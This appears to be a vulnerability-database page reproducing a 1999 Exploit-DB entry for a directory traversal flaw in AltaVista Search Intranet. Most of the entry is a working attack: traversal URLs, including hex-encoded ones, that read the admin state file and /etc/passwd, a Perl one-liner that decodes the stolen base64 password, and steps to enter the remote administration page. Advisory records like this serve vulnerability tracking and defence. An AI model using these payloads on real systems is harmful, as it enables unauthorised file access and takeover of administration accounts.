Lucene search
+L

AltaVista Search Intranet 2.0 b/2.3 - Directory Traversal

🗓️ 29 Dec 1999 00:00:00Reported by Rudi CarellType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 26 Views

AltaVista Search engine vulnerable to directory traversal, allowing access to sensitive files and passwords.

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
AltaVista Intranet Search CGI query Traversal Arbitrary File Access
9 Jan 200000:00
nessus
cve
CVE
CVE-2000-0039
22 Mar 200005:00
cve
cvelist
Cvelist
CVE-2000-0039
22 Mar 200005:00
cvelist
euvd
EUVD
EUVD-2000-0039
7 Oct 202500:30
euvd
nvd
NVD
CVE-2000-0039
29 Dec 199905:00
nvd
source: https://www.securityfocus.com/bid/896/info

The AltaVista Search engine sets up a webserver at port 9000 to listen for search queries. The main search function will accept a single '../' string in the query, providing access to all documents in the 'http' directory one level up. These documents contain various administrative information, including the password for the remote administration utility. The password is base-64 encoded, and can be easily restored to plaintext to give an attacker full remote administration abilities for the search engine. The webserver will accept multiple '../' strings if they are hex encoded, ie '%2e%2e%2f'.

http://target:9000/cgi-bin/query?mss=../logs/mgtstate
(to get the mgtstate file.)

#!/usr/bin/perl
use MIME::Base64;
print decode_base64("$ARGV[0]"), "\n";
(to unencode the username/password)

http://target:9000/cgi-bin/mgt
and enter the username/password to access the remote administration features

or
http://target:9000/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
to get the password file on a unix system

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Jul 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.05917
26